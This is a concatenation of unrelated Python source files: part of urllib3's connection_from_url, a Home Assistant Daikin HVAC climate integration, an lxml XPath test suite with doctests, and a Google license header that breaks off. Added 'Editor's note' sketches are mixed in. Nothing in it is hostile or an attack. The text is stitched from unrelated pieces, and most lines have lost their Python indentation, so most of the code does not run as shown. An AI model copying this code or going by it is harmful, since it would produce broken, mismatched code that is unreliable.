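# Editor's note: an illustrative sketch, not part of urllib3, showing how the
# certificate-related arguments described in the HTTPSConnectionPool docstring
# are typically supplied. The CA bundle path is a hypothetical placeholder.
def _example_verified_https_pool():
    pool = HTTPSConnectionPool(
        'example.com', port=443,
        cert_reqs='CERT_REQUIRED',            # verify the server certificate
        ca_certs='/path/to/ca_bundle.pem')    # hypothetical CA bundle path
    # ``request`` is inherited from RequestMethods via HTTPConnectionPool.
    return pool.request('GET', '/').status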
def connection_from_url(url, **kw):
"""
Given a url, return an :class:`.ConnectionPool` instance of its host.
This is a shortcut for not having to parse out the scheme, host, and port
of the url before creating an :class:`.ConnectionPool` instance.
:param url:
Absolute URL string that must include the scheme. Port is optional.
:param \**kw:
Passes additional parameters to the constructor of the appropriate
:class:`.ConnectionPool`. Useful for specifying things like
timeout, maxsize, headers, etc.
Example::
>>> conn = connection_from_url('http://google.com/')
>>> r = conn.request('GET', '/')
"""
scheme, host, port = get_host(url)
if scheme == 'https':
return HTTPSConnectionPool(host, port=port, **kw)
else:
return HTTPConnectionPool(host, port=port, **kw)
|
|
"""Support for the Daikin HVAC."""
import logging
import re
import voluptuous as vol
from homeassistant.components.climate import ClimateDevice, PLATFORM_SCHEMA
from homeassistant.components.climate.const import (
ATTR_CURRENT_TEMPERATURE, ATTR_FAN_MODE, ATTR_OPERATION_MODE,
ATTR_SWING_MODE, STATE_AUTO, STATE_COOL, STATE_DRY,
STATE_FAN_ONLY, STATE_HEAT, SUPPORT_FAN_MODE,
SUPPORT_OPERATION_MODE, SUPPORT_SWING_MODE, SUPPORT_TARGET_TEMPERATURE)
from homeassistant.components.daikin import DOMAIN as DAIKIN_DOMAIN
from homeassistant.components.daikin.const import (
ATTR_INSIDE_TEMPERATURE, ATTR_OUTSIDE_TEMPERATURE, ATTR_TARGET_TEMPERATURE)
from homeassistant.const import (
ATTR_TEMPERATURE, CONF_HOST, CONF_NAME, STATE_OFF, TEMP_CELSIUS)
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_NAME): cv.string,
})
HA_STATE_TO_DAIKIN = {
STATE_FAN_ONLY: 'fan',
STATE_DRY: 'dry',
STATE_COOL: 'cool',
STATE_HEAT: 'hot',
STATE_AUTO: 'auto',
STATE_OFF: 'off',
}
DAIKIN_TO_HA_STATE = {
'fan': STATE_FAN_ONLY,
'dry': STATE_DRY,
'cool': STATE_COOL,
'hot': STATE_HEAT,
'auto': STATE_AUTO,
'off': STATE_OFF,
}
HA_ATTR_TO_DAIKIN = {
ATTR_OPERATION_MODE: 'mode',
ATTR_FAN_MODE: 'f_rate',
ATTR_SWING_MODE: 'f_dir',
ATTR_INSIDE_TEMPERATURE: 'htemp',
ATTR_OUTSIDE_TEMPERATURE: 'otemp',
ATTR_TARGET_TEMPERATURE: 'stemp'
}
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Old way of setting up the Daikin HVAC platform.
Can only be called when a user accidentally mentions the platform in their
config. But even in that case it would have been ignored.
"""
pass
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up Daikin climate based on config_entry."""
daikin_api = hass.data[DAIKIN_DOMAIN].get(entry.entry_id)
async_add_entities([DaikinClimate(daikin_api)])
class DaikinClimate(ClimateDevice):
"""Representation of a Daikin HVAC."""
def __init__(self, api):
"""Initialize the climate device."""
from pydaikin import appliance
self._api = api
self._list = {
ATTR_OPERATION_MODE: list(HA_STATE_TO_DAIKIN),
ATTR_FAN_MODE: list(
map(
str.title,
appliance.daikin_values(HA_ATTR_TO_DAIKIN[ATTR_FAN_MODE])
)
),
ATTR_SWING_MODE: list(
map(
str.title,
appliance.daikin_values(HA_ATTR_TO_DAIKIN[ATTR_SWING_MODE])
)
),
}
self._supported_features = SUPPORT_TARGET_TEMPERATURE \
| SUPPORT_OPERATION_MODE
if self._api.device.support_fan_mode:
self._supported_features |= SUPPORT_FAN_MODE
if self._api.device.support_swing_mode:
self._supported_features |= SUPPORT_SWING_MODE
def get(self, key):
"""Retrieve device settings from API library cache."""
value = None
cast_to_float = False
if key in [ATTR_TEMPERATURE, ATTR_INSIDE_TEMPERATURE,
ATTR_CURRENT_TEMPERATURE]:
key = ATTR_INSIDE_TEMPERATURE
daikin_attr = HA_ATTR_TO_DAIKIN.get(key)
if key == ATTR_INSIDE_TEMPERATURE:
value = self._api.device.values.get(daikin_attr)
cast_to_float = True
elif key == ATTR_TARGET_TEMPERATURE:
value = self._api.device.values.get(daikin_attr)
cast_to_float = True
elif key == ATTR_OUTSIDE_TEMPERATURE:
value = self._api.device.values.get(daikin_attr)
cast_to_float = True
elif key == ATTR_FAN_MODE:
value = self._api.device.represent(daikin_attr)[1].title()
elif key == ATTR_SWING_MODE:
value = self._api.device.represent(daikin_attr)[1].title()
elif key == ATTR_OPERATION_MODE:
            # Daikin can also return internal states auto-1 or auto-7,
            # which need to be translated to AUTO
daikin_mode = re.sub(
'[^a-z]', '',
self._api.device.represent(daikin_attr)[1])
ha_mode = DAIKIN_TO_HA_STATE.get(daikin_mode)
value = ha_mode
if value is None:
_LOGGER.error("Invalid value requested for key %s", key)
else:
if value in ("-", "--"):
value = None
elif cast_to_float:
try:
value = float(value)
except ValueError:
value = None
return value
def set(self, settings):
"""Set device settings using API."""
values = {}
for attr in [ATTR_TEMPERATURE, ATTR_FAN_MODE, ATTR_SWING_MODE,
ATTR_OPERATION_MODE]:
value = settings.get(attr)
if value is None:
continue
daikin_attr = HA_ATTR_TO_DAIKIN.get(attr)
if daikin_attr is not None:
if attr == ATTR_OPERATION_MODE:
values[daikin_attr] = HA_STATE_TO_DAIKIN[value]
elif value in self._list[attr]:
values[daikin_attr] = value.lower()
else:
_LOGGER.error("Invalid value %s for %s", attr, value)
# temperature
elif attr == ATTR_TEMPERATURE:
try:
values['stemp'] = str(int(value))
except ValueError:
_LOGGER.error("Invalid temperature %s", value)
if values:
self._api.device.set(values)
@property
def supported_features(self):
"""Return the list of supported features."""
return self._supported_features
@property
def name(self):
"""Return the name of the thermostat, if any."""
return self._api.name
@property
def unique_id(self):
"""Return a unique ID."""
return self._api.mac
@property
def temperature_unit(self):
"""Return the unit of measurement which this thermostat uses."""
return TEMP_CELSIUS
@property
def current_temperature(self):
"""Return the current temperature."""
return self.get(ATTR_CURRENT_TEMPERATURE)
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return self.get(ATTR_TARGET_TEMPERATURE)
@property
def target_temperature_step(self):
"""Return the supported step of target temperature."""
return 1
def set_temperature(self, **kwargs):
"""Set new target temperature."""
self.set(kwargs)
@property
def current_operation(self):
"""Return current operation ie. heat, cool, idle."""
return self.get(ATTR_OPERATION_MODE)
@property
def operation_list(self):
"""Return the list of available operation modes."""
return self._list.get(ATTR_OPERATION_MODE)
def set_operation_mode(self, operation_mode):
"""Set HVAC mode."""
self.set({ATTR_OPERATION_MODE: operation_mode})
@property
def current_fan_mode(self):
"""Return the fan setting."""
return self.get(ATTR_FAN_MODE)
def set_fan_mode(self, fan_mode):
"""Set fan mode."""
self.set({ATTR_FAN_MODE: fan_mode})
@property
def fan_list(self):
"""List of available fan modes."""
return self._list.get(ATTR_FAN_MODE)
@property
def current_swing_mode(self):
"""Return the fan setting."""
return self.get(ATTR_SWING_MODE)
def set_swing_mode(self, swing_mode):
"""Set new target temperature."""
self.set({ATTR_SWING_MODE: swing_mode})
@property
def swing_list(self):
"""List of available swing modes."""
return self._list.get(ATTR_SWING_MODE)
def update(self):
"""Retrieve latest state."""
self._api.update()
@property
def device_info(self):
"""Return a device description for device registry."""
return self._api.device_info
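
# Editor's note: an illustrative, self-contained sketch (not part of Home
# Assistant) of how the HA_STATE_TO_DAIKIN / HA_ATTR_TO_DAIKIN tables above
# translate a service call into raw Daikin API fields, mirroring the logic of
# DaikinClimate.set().
def _example_translate_settings():
    settings = {ATTR_OPERATION_MODE: STATE_COOL, ATTR_TEMPERATURE: 22.5}
    values = {
        HA_ATTR_TO_DAIKIN[ATTR_OPERATION_MODE]:
            HA_STATE_TO_DAIKIN[settings[ATTR_OPERATION_MODE]],
        'stemp': str(int(settings[ATTR_TEMPERATURE])),
    }
    return values  # e.g. {'mode': 'cool', 'stemp': '22'}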
|
|
# -*- coding: utf-8 -*-
"""
Test cases related to XPath evaluation and the XPath class
"""
import unittest, sys, os.path
this_dir = os.path.dirname(__file__)
if this_dir not in sys.path:
sys.path.insert(0, this_dir) # needed for Py3
from common_imports import etree, HelperTestCase, _bytes, BytesIO
from common_imports import doctest, make_doctest
class ETreeXPathTestCase(HelperTestCase):
"""XPath tests etree"""
def test_xpath_boolean(self):
tree = self.parse('<a><b></b><b></b></a>')
self.assert_(tree.xpath('boolean(/a/b)'))
self.assert_(not tree.xpath('boolean(/a/c)'))
def test_xpath_number(self):
tree = self.parse('<a>1</a>')
self.assertEquals(1.,
tree.xpath('number(/a)'))
tree = self.parse('<a>A</a>')
actual = str(tree.xpath('number(/a)'))
expected = ['nan', '1.#qnan', 'nanq']
if not actual.lower() in expected:
self.fail('Expected a NAN value, got %s' % actual)
def test_xpath_string(self):
tree = self.parse('<a>Foo</a>')
self.assertEquals('Foo',
tree.xpath('string(/a/text())'))
def test_xpath_document_root(self):
tree = self.parse('<a><b/></a>')
self.assertEquals([],
tree.xpath('/'))
def test_xpath_namespace(self):
tree = self.parse('<a xmlns="test" xmlns:p="myURI"/>')
self.assert_((None, "test") in tree.xpath('namespace::*'))
self.assert_(('p', 'myURI') in tree.xpath('namespace::*'))
def test_xpath_namespace_empty(self):
tree = self.parse('<a/>')
self.assertEquals([('xml', 'http://www.w3.org/XML/1998/namespace')],
tree.xpath('namespace::*'))
def test_xpath_list_elements(self):
tree = self.parse('<a><b>Foo</b><b>Bar</b></a>')
root = tree.getroot()
self.assertEquals([root[0], root[1]],
tree.xpath('/a/b'))
def test_xpath_list_nothing(self):
tree = self.parse('<a><b/></a>')
self.assertEquals([],
tree.xpath('/a/c'))
# this seems to pass a different code path, also should return nothing
self.assertEquals([],
tree.xpath('/a/c/text()'))
def test_xpath_list_text(self):
tree = self.parse('<a><b>Foo</b><b>Bar</b></a>')
root = tree.getroot()
self.assertEquals(['Foo', 'Bar'],
tree.xpath('/a/b/text()'))
def test_xpath_list_text_parent(self):
tree = self.parse('<a><b>FooBar</b><b>BarFoo</b></a>')
root = tree.getroot()
self.assertEquals(['FooBar', 'BarFoo'],
tree.xpath('/a/b/text()'))
self.assertEquals([root[0], root[1]],
[r.getparent() for r in tree.xpath('/a/b/text()')])
def test_xpath_list_text_parent_no_smart_strings(self):
tree = self.parse('<a><b>FooBar</b><b>BarFoo</b></a>')
root = tree.getroot()
self.assertEquals(['FooBar', 'BarFoo'],
tree.xpath('/a/b/text()', smart_strings=True))
self.assertEquals([root[0], root[1]],
[r.getparent() for r in
tree.xpath('/a/b/text()', smart_strings=True)])
self.assertEquals([None, None],
[r.attrname for r in
tree.xpath('/a/b/text()', smart_strings=True)])
self.assertEquals(['FooBar', 'BarFoo'],
tree.xpath('/a/b/text()', smart_strings=False))
self.assertEquals([False, False],
[hasattr(r, 'getparent') for r in
tree.xpath('/a/b/text()', smart_strings=False)])
        self.assertEquals([False, False],
                          [hasattr(r, 'attrname') for r in
                           tree.xpath('/a/b/text()', smart_strings=False)])
def test_xpath_list_unicode_text_parent(self):
xml = _bytes('<a><b>FooBar\\u0680\\u3120</b><b>BarFoo\\u0680\\u3120</b></a>').decode("unicode_escape")
tree = self.parse(xml.encode('utf-8'))
root = tree.getroot()
self.assertEquals([_bytes('FooBar\\u0680\\u3120').decode("unicode_escape"),
_bytes('BarFoo\\u0680\\u3120').decode("unicode_escape")],
tree.xpath('/a/b/text()'))
self.assertEquals([root[0], root[1]],
[r.getparent() for r in tree.xpath('/a/b/text()')])
def test_xpath_list_attribute(self):
tree = self.parse('<a b="B" c="C"/>')
self.assertEquals(['B'],
tree.xpath('/a/@b'))
def test_xpath_list_attribute_parent(self):
tree = self.parse('<a b="BaSdFgHjKl" c="CqWeRtZuI"/>')
results = tree.xpath('/a/@c')
self.assertEquals(1, len(results))
self.assertEquals('CqWeRtZuI', results[0])
self.assertEquals(tree.getroot().tag, results[0].getparent().tag)
def test_xpath_list_attribute_parent_no_smart_strings(self):
tree = self.parse('<a b="BaSdFgHjKl" c="CqWeRtZuI"/>')
results = tree.xpath('/a/@c', smart_strings=True)
self.assertEquals(1, len(results))
self.assertEquals('CqWeRtZuI', results[0])
self.assertEquals('c', results[0].attrname)
self.assertEquals(tree.getroot().tag, results[0].getparent().tag)
results = tree.xpath('/a/@c', smart_strings=False)
self.assertEquals(1, len(results))
self.assertEquals('CqWeRtZuI', results[0])
self.assertEquals(False, hasattr(results[0], 'getparent'))
self.assertEquals(False, hasattr(results[0], 'attrname'))
def test_xpath_text_from_other_document(self):
xml_data = '''
<table>
<item xml:id="k1"><value>v1</value></item>
<item xml:id="k2"><value>v2</value></item>
</table>
'''
def lookup(dummy, id):
return etree.XML(xml_data).xpath('id(%r)' % id)
functions = {(None, 'lookup') : lookup}
root = etree.XML('<dummy/>')
values = root.xpath("lookup('k1')/value/text()",
extensions=functions)
self.assertEquals(['v1'], values)
self.assertEquals('value', values[0].getparent().tag)
def test_xpath_list_comment(self):
tree = self.parse('<a><!-- Foo --></a>')
self.assertEquals(['<!-- Foo -->'],
list(map(repr, tree.xpath('/a/node()'))))
def test_rel_xpath_boolean(self):
root = etree.XML('<a><b><c/></b></a>')
el = root[0]
self.assert_(el.xpath('boolean(c)'))
self.assert_(not el.xpath('boolean(d)'))
def test_rel_xpath_list_elements(self):
tree = self.parse('<a><c><b>Foo</b><b>Bar</b></c><c><b>Hey</b></c></a>')
root = tree.getroot()
c = root[0]
self.assertEquals([c[0], c[1]],
c.xpath('b'))
self.assertEquals([c[0], c[1], root[1][0]],
c.xpath('//b'))
def test_xpath_ns(self):
tree = self.parse('<a xmlns="uri:a"><b></b></a>')
root = tree.getroot()
self.assertEquals(
[root[0]],
tree.xpath('//foo:b', namespaces={'foo': 'uri:a'}))
self.assertEquals(
[],
tree.xpath('//foo:b', namespaces={'foo': 'uri:c'}))
self.assertEquals(
[root[0]],
root.xpath('//baz:b', namespaces={'baz': 'uri:a'}))
def test_xpath_ns_none(self):
tree = self.parse('<a xmlns="uri:a"><b></b></a>')
root = tree.getroot()
self.assertRaises(
TypeError,
root.xpath, '//b', namespaces={None: 'uri:a'})
def test_xpath_ns_empty(self):
tree = self.parse('<a xmlns="uri:a"><b></b></a>')
root = tree.getroot()
self.assertRaises(
TypeError,
root.xpath, '//b', namespaces={'': 'uri:a'})
def test_xpath_error(self):
tree = self.parse('<a/>')
self.assertRaises(etree.XPathEvalError, tree.xpath, '\\fad')
def test_xpath_class_error(self):
self.assertRaises(SyntaxError, etree.XPath, '\\fad')
self.assertRaises(etree.XPathSyntaxError, etree.XPath, '\\fad')
def test_xpath_prefix_error(self):
tree = self.parse('<a/>')
self.assertRaises(etree.XPathEvalError, tree.xpath, '/fa:d')
def test_xpath_class_prefix_error(self):
tree = self.parse('<a/>')
xpath = etree.XPath("/fa:d")
self.assertRaises(etree.XPathEvalError, xpath, tree)
def test_elementtree_getpath(self):
a = etree.Element("a")
b = etree.SubElement(a, "b")
c = etree.SubElement(a, "c")
d1 = etree.SubElement(c, "d")
d2 = etree.SubElement(c, "d")
tree = etree.ElementTree(a)
self.assertEqual('/a/c/d',
tree.getpath(d2)[:6])
self.assertEqual([d2],
tree.xpath(tree.getpath(d2)))
def test_elementtree_getpath_partial(self):
a = etree.Element("a")
b = etree.SubElement(a, "b")
c = etree.SubElement(a, "c")
d1 = etree.SubElement(c, "d")
d2 = etree.SubElement(c, "d")
tree = etree.ElementTree(c)
self.assertEqual('/c/d',
tree.getpath(d2)[:4])
self.assertEqual([d2],
tree.xpath(tree.getpath(d2)))
def test_xpath_evaluator(self):
tree = self.parse('<a><b><c></c></b></a>')
e = etree.XPathEvaluator(tree)
root = tree.getroot()
self.assertEquals(
[root],
e('//a'))
def test_xpath_evaluator_tree(self):
tree = self.parse('<a><b><c></c></b></a>')
child_tree = etree.ElementTree(tree.getroot()[0])
e = etree.XPathEvaluator(child_tree)
self.assertEquals(
[],
e('a'))
root = child_tree.getroot()
self.assertEquals(
[root[0]],
e('c'))
def test_xpath_evaluator_tree_absolute(self):
tree = self.parse('<a><b><c></c></b></a>')
child_tree = etree.ElementTree(tree.getroot()[0])
e = etree.XPathEvaluator(child_tree)
self.assertEquals(
[],
e('/a'))
root = child_tree.getroot()
self.assertEquals(
[root],
e('/b'))
self.assertEquals(
[],
e('/c'))
def test_xpath_evaluator_element(self):
tree = self.parse('<a><b><c></c></b></a>')
root = tree.getroot()
e = etree.XPathEvaluator(root[0])
self.assertEquals(
[root[0][0]],
e('c'))
def test_xpath_extensions(self):
def foo(evaluator, a):
return 'hello %s' % a
extension = {(None, 'foo'): foo}
tree = self.parse('<a><b></b></a>')
e = etree.XPathEvaluator(tree, extensions=[extension])
self.assertEquals(
"hello you", e("foo('you')"))
def test_xpath_extensions_wrong_args(self):
def foo(evaluator, a, b):
return "hello %s and %s" % (a, b)
extension = {(None, 'foo'): foo}
tree = self.parse('<a><b></b></a>')
e = etree.XPathEvaluator(tree, extensions=[extension])
self.assertRaises(TypeError, e, "foo('you')")
def test_xpath_extensions_error(self):
def foo(evaluator, a):
return 1/0
extension = {(None, 'foo'): foo}
tree = self.parse('<a/>')
e = etree.XPathEvaluator(tree, extensions=[extension])
self.assertRaises(ZeroDivisionError, e, "foo('test')")
def test_xpath_extensions_nodes(self):
def f(evaluator, arg):
r = etree.Element('results')
b = etree.SubElement(r, 'result')
b.text = 'Hoi'
b = etree.SubElement(r, 'result')
b.text = 'Dag'
return r
x = self.parse('<a/>')
e = etree.XPathEvaluator(x, extensions=[{(None, 'foo'): f}])
r = e("foo('World')/result")
self.assertEquals(2, len(r))
self.assertEquals('Hoi', r[0].text)
self.assertEquals('Dag', r[1].text)
def test_xpath_extensions_nodes_append(self):
def f(evaluator, nodes):
r = etree.SubElement(nodes[0], 'results')
b = etree.SubElement(r, 'result')
b.text = 'Hoi'
b = etree.SubElement(r, 'result')
b.text = 'Dag'
return r
x = self.parse('<a/>')
e = etree.XPathEvaluator(x, extensions=[{(None, 'foo'): f}])
r = e("foo(/*)/result")
self.assertEquals(2, len(r))
self.assertEquals('Hoi', r[0].text)
self.assertEquals('Dag', r[1].text)
def test_xpath_extensions_nodes_append2(self):
def f(evaluator, nodes):
r = etree.Element('results')
b = etree.SubElement(r, 'result')
b.text = 'Hoi'
b = etree.SubElement(r, 'result')
b.text = 'Dag'
r.append(nodes[0])
return r
x = self.parse('<result>Honk</result>')
e = etree.XPathEvaluator(x, extensions=[{(None, 'foo'): f}])
r = e("foo(/*)/result")
self.assertEquals(3, len(r))
self.assertEquals('Hoi', r[0].text)
self.assertEquals('Dag', r[1].text)
self.assertEquals('Honk', r[2].text)
def test_xpath_context_node(self):
tree = self.parse('<root><a/><b><c/></b></root>')
check_call = []
def check_context(ctxt, nodes):
self.assertEquals(len(nodes), 1)
check_call.append(nodes[0].tag)
self.assertEquals(ctxt.context_node, nodes[0])
return True
find = etree.XPath("//*[p:foo(.)]",
namespaces={'p' : 'ns'},
extensions=[{('ns', 'foo') : check_context}])
find(tree)
check_call.sort()
self.assertEquals(check_call, ["a", "b", "c", "root"])
def test_xpath_eval_context_propagation(self):
tree = self.parse('<root><a/><b><c/></b></root>')
check_call = {}
def check_context(ctxt, nodes):
self.assertEquals(len(nodes), 1)
tag = nodes[0].tag
# empty during the "b" call, a "b" during the "c" call
check_call[tag] = ctxt.eval_context.get("b")
ctxt.eval_context[tag] = tag
return True
find = etree.XPath("//b[p:foo(.)]/c[p:foo(.)]",
namespaces={'p' : 'ns'},
extensions=[{('ns', 'foo') : check_context}])
result = find(tree)
self.assertEquals(result, [tree.getroot()[1][0]])
self.assertEquals(check_call, {'b':None, 'c':'b'})
def test_xpath_eval_context_clear(self):
tree = self.parse('<root><a/><b><c/></b></root>')
check_call = {}
def check_context(ctxt):
check_call["done"] = True
# context must be empty for each new evaluation
self.assertEquals(len(ctxt.eval_context), 0)
ctxt.eval_context["test"] = True
return True
find = etree.XPath("//b[p:foo()]",
namespaces={'p' : 'ns'},
extensions=[{('ns', 'foo') : check_context}])
result = find(tree)
self.assertEquals(result, [tree.getroot()[1]])
self.assertEquals(check_call["done"], True)
check_call.clear()
find = etree.XPath("//b[p:foo()]",
namespaces={'p' : 'ns'},
extensions=[{('ns', 'foo') : check_context}])
result = find(tree)
self.assertEquals(result, [tree.getroot()[1]])
self.assertEquals(check_call["done"], True)
def test_xpath_variables(self):
x = self.parse('<a attr="true"/>')
e = etree.XPathEvaluator(x)
expr = "/a[@attr=$aval]"
r = e(expr, aval=1)
self.assertEquals(0, len(r))
r = e(expr, aval="true")
self.assertEquals(1, len(r))
self.assertEquals("true", r[0].get('attr'))
r = e(expr, aval=True)
self.assertEquals(1, len(r))
self.assertEquals("true", r[0].get('attr'))
def test_xpath_variables_nodeset(self):
x = self.parse('<a attr="true"/>')
e = etree.XPathEvaluator(x)
element = etree.Element("test-el")
etree.SubElement(element, "test-sub")
expr = "$value"
r = e(expr, value=element)
self.assertEquals(1, len(r))
self.assertEquals(element.tag, r[0].tag)
self.assertEquals(element[0].tag, r[0][0].tag)
def test_xpath_extensions_mix(self):
x = self.parse('<a attr="true"><test/></a>')
class LocalException(Exception):
pass
def foo(evaluator, a, varval):
etree.Element("DUMMY")
if varval == 0:
raise LocalException
elif varval == 1:
return ()
elif varval == 2:
return None
elif varval == 3:
return a[0][0]
a = a[0]
if a.get("attr") == str(varval):
return a
else:
return etree.Element("NODE")
extension = {(None, 'foo'): foo}
e = etree.XPathEvaluator(x, extensions=[extension])
del x
self.assertRaises(LocalException, e, "foo(., 0)")
self.assertRaises(LocalException, e, "foo(., $value)", value=0)
r = e("foo(., $value)", value=1)
self.assertEqual(len(r), 0)
r = e("foo(., 1)")
self.assertEqual(len(r), 0)
r = e("foo(., $value)", value=2)
self.assertEqual(len(r), 0)
r = e("foo(., $value)", value=3)
self.assertEqual(len(r), 1)
self.assertEqual(r[0].tag, "test")
r = e("foo(., $value)", value="false")
self.assertEqual(len(r), 1)
self.assertEqual(r[0].tag, "NODE")
r = e("foo(., 'false')")
self.assertEqual(len(r), 1)
self.assertEqual(r[0].tag, "NODE")
r = e("foo(., 'true')")
self.assertEqual(len(r), 1)
self.assertEqual(r[0].tag, "a")
self.assertEqual(r[0][0].tag, "test")
r = e("foo(., $value)", value="true")
self.assertEqual(len(r), 1)
self.assertEqual(r[0].tag, "a")
self.assertRaises(LocalException, e, "foo(., 0)")
self.assertRaises(LocalException, e, "foo(., $value)", value=0)
class ETreeXPathClassTestCase(HelperTestCase):
"Tests for the XPath class"
def test_xpath_compile_doc(self):
x = self.parse('<a attr="true"/>')
expr = etree.XPath("/a[@attr != 'true']")
r = expr(x)
self.assertEquals(0, len(r))
expr = etree.XPath("/a[@attr = 'true']")
r = expr(x)
self.assertEquals(1, len(r))
expr = etree.XPath( expr.path )
r = expr(x)
self.assertEquals(1, len(r))
def test_xpath_compile_element(self):
x = self.parse('<a><b/><c/></a>')
root = x.getroot()
expr = etree.XPath("./b")
r = expr(root)
self.assertEquals(1, len(r))
self.assertEquals('b', r[0].tag)
expr = etree.XPath("./*")
r = expr(root)
self.assertEquals(2, len(r))
def test_xpath_compile_vars(self):
x = self.parse('<a attr="true"/>')
expr = etree.XPath("/a[@attr=$aval]")
r = expr(x, aval=False)
self.assertEquals(0, len(r))
r = expr(x, aval=True)
self.assertEquals(1, len(r))
def test_xpath_compile_error(self):
self.assertRaises(SyntaxError, etree.XPath, '\\fad')
def test_xpath_elementtree_error(self):
self.assertRaises(ValueError, etree.XPath('*'), etree.ElementTree())
class ETreeXPathExsltTestCase(HelperTestCase):
"Tests for the EXSLT support in XPath (requires libxslt 1.1.25+)"
NSMAP = dict(
date = "http://exslt.org/dates-and-times",
math = "http://exslt.org/math",
set = "http://exslt.org/sets",
str = "http://exslt.org/strings",
)
def test_xpath_exslt_functions_date(self):
tree = self.parse('<a><b>2009-11-12</b><b>2008-12-11</b></a>')
match_dates = tree.xpath('//b[date:year(string()) = 2009]',
namespaces=self.NSMAP)
self.assertTrue(match_dates, str(match_dates))
self.assertEquals(len(match_dates), 1, str(match_dates))
self.assertEquals(match_dates[0].text, '2009-11-12')
def test_xpath_exslt_functions_strings(self):
tree = self.parse('<a><b>2009-11-12</b><b>2008-12-11</b></a>')
match_date = tree.xpath('str:replace(//b[1], "-", "*")',
namespaces=self.NSMAP)
self.assertTrue(match_date, str(match_date))
self.assertEquals(match_date, '2009*11*12')
class ETreeETXPathClassTestCase(HelperTestCase):
"Tests for the ETXPath class"
def test_xpath_compile_ns(self):
x = self.parse('<a><b xmlns="nsa"/><b xmlns="nsb"/></a>')
expr = etree.ETXPath("/a/{nsa}b")
r = expr(x)
self.assertEquals(1, len(r))
self.assertEquals('{nsa}b', r[0].tag)
expr = etree.ETXPath("/a/{nsb}b")
r = expr(x)
self.assertEquals(1, len(r))
self.assertEquals('{nsb}b', r[0].tag)
# disabled this test as non-ASCII characters in namespace URIs are
# not acceptable
def _test_xpath_compile_unicode(self):
x = self.parse(_bytes('<a><b xmlns="http://nsa/\\uf8d2"/><b xmlns="http://nsb/\\uf8d1"/></a>'
).decode("unicode_escape"))
expr = etree.ETXPath(_bytes("/a/{http://nsa/\\uf8d2}b").decode("unicode_escape"))
r = expr(x)
self.assertEquals(1, len(r))
self.assertEquals(_bytes('{http://nsa/\\uf8d2}b').decode("unicode_escape"), r[0].tag)
expr = etree.ETXPath(_bytes("/a/{http://nsb/\\uf8d1}b").decode("unicode_escape"))
r = expr(x)
self.assertEquals(1, len(r))
self.assertEquals(_bytes('{http://nsb/\\uf8d1}b').decode("unicode_escape"), r[0].tag)
SAMPLE_XML = etree.parse(BytesIO("""
<body>
<tag>text</tag>
<section>
<tag>subtext</tag>
</section>
<tag />
<tag />
</body>
"""))
def tag(elem):
return elem.tag
def tag_or_value(elem):
return getattr(elem, 'tag', elem)
def stringTest(ctxt, s1):
return "Hello "+s1
def stringListTest(ctxt, s1):
return ["Hello "] + list(s1) + ["!"]
def floatTest(ctxt, f1):
return f1+4
def booleanTest(ctxt, b1):
return not b1
def setTest(ctxt, st1):
return st1[0]
def setTest2(ctxt, st1):
return st1[0:2]
def argsTest1(ctxt, s, f, b, st):
return ", ".join(map(str, (s, f, b, list(map(tag, st)))))
def argsTest2(ctxt, st1, st2):
st1.extend(st2)
return st1
def resultTypesTest(ctxt):
return [None,None]
def resultTypesTest2(ctxt):
return resultTypesTest
uri = "http://www.example.com/"
extension = {(None, 'stringTest'): stringTest,
(None, 'stringListTest'): stringListTest,
(None, 'floatTest'): floatTest,
(None, 'booleanTest'): booleanTest,
(None, 'setTest'): setTest,
(None, 'setTest2'): setTest2,
(None, 'argsTest1'): argsTest1,
(None, 'argsTest2'): argsTest2,
(None, 'resultTypesTest'): resultTypesTest,
(None, 'resultTypesTest2'): resultTypesTest2,}
def xpath():
"""
Test xpath extension functions.
>>> root = SAMPLE_XML
>>> e = etree.XPathEvaluator(root, extensions=[extension])
>>> e("stringTest('you')")
'Hello you'
>>> e(_bytes("stringTest('\\\\xe9lan')").decode("unicode_escape"))
u'Hello \\xe9lan'
>>> e("stringTest('you','there')")
Traceback (most recent call last):
...
TypeError: stringTest() takes exactly 2 arguments (3 given)
>>> e("floatTest(2)")
6.0
>>> e("booleanTest(true())")
False
>>> list(map(tag, e("setTest(/body/tag)")))
['tag']
>>> list(map(tag, e("setTest2(/body/*)")))
['tag', 'section']
>>> list(map(tag_or_value, e("stringListTest(/body/tag)")))
['Hello ', 'tag', 'tag', 'tag', '!']
>>> e("argsTest1('a',1.5,true(),/body/tag)")
"a, 1.5, True, ['tag', 'tag', 'tag']"
>>> list(map(tag, e("argsTest2(/body/tag, /body/section)")))
['tag', 'section', 'tag', 'tag']
>>> e("resultTypesTest()")
Traceback (most recent call last):
...
XPathResultError: This is not a supported node-set result: None
>>> try:
... e("resultTypesTest2()")
... except etree.XPathResultError:
... print("Got error")
Got error
"""
if sys.version_info[0] >= 3:
xpath.__doc__ = xpath.__doc__.replace(" u'", " '")
xpath.__doc__ = xpath.__doc__.replace(" XPathResultError",
" lxml.etree.XPathResultError")
xpath.__doc__ = xpath.__doc__.replace(" exactly 2 arguments",
" exactly 2 positional arguments")
def test_suite():
suite = unittest.TestSuite()
suite.addTests([unittest.makeSuite(ETreeXPathTestCase)])
suite.addTests([unittest.makeSuite(ETreeXPathClassTestCase)])
if etree.LIBXSLT_COMPILED_VERSION >= (1,1,25):
suite.addTests([unittest.makeSuite(ETreeXPathExsltTestCase)])
suite.addTests([unittest.makeSuite(ETreeETXPathClassTestCase)])
suite.addTests([doctest.DocTestSuite()])
suite.addTests(
[make_doctest('../../../doc/xpathxslt.txt')])
return suite
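
# Editor's note: an illustrative sketch, not part of the lxml test suite,
# condensing the extension-function mechanism exercised by the tests above: a
# Python callable registered under a (namespace, name) key becomes callable
# from XPath expressions. The 'greet' function and document are hypothetical.
def _example_extension_function():
    def greet(context, name):
        return 'hello %s' % name
    root = etree.XML('<doc><name>world</name></doc>')
    evaluator = etree.XPathEvaluator(
        root, extensions=[{(None, 'greet'): greet}])
    return evaluator("greet(string(/doc/name))")  # -> 'hello world'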
if __name__ == '__main__':
print('to test use test.py %s' % __file__)
|
|
# Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
